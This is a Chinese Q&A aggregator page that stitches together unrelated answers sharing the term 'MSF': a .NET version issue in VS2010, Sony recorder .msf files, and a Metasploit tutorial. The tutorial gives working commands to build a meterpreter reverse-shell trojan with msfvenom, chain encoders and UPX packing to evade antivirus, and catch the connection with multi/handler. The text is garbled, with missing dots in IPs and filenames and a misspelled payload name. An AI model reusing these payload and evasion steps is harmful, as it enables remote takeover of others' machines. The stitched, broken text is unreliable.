大部分电脑现在都装了Net但是一般是20版本或者35版本,所以你要注意以下版本问题,VS2010新建C#项目的时候都用的C#40也就是要Net 40才能运行,你可以调低一点然后再试试,不然你可以使用VS2010的应用程序发布功能生成一个安装包,安装包运行的时候会自动检测Net是否可用,不然会在线安装。
讯息列表文件(msglistmsf)说明并控制voice文件夹结构、讯息名和文件夹名、包含在每一讯息文件夹中的讯息数、优先级和报警设置,以及其它文件和文件夹信息,并保存一个备份文件(msglistbmsf)。。所以此文件不是录音文件,而是录音文件的控制文件
或者你可以尝试下这个软件,好像可用。
>
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制
二,工具:MSF
三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
四,过程:
1,查看帮助
命令: root# msfvenom -h
结果:
2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
结果:
3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是1921681113,端口设置成443所以最后连接会通向1921681113的443端口
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=1921681113 LPORT=443 -f exe > abcexe
注:如果只是用msfpayload生成,简单示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=1921681113 X > Desktop/abcexe
多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192168128129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acnexe
upx加壳:upx -5 /root/Desktop/acnexe
结果:
说明: -p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
4,把生成的abcexe放到win7下执行
5,在命令行下,打开msfconsole
命令: root # msfconsole
6,本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
结果:
7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来
8,验证
以上就是关于求大神,VS2010中创建了一个MSF应用程序,但打不开,...Compact3.5也安装了全部的内容,包括:求大神,VS2010中创建了一个MSF应用程序,但打不开,...Compact3.5也安装了、如何打开索尼录音笔的msf 文件、如何用msfvenom生成木马程序等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)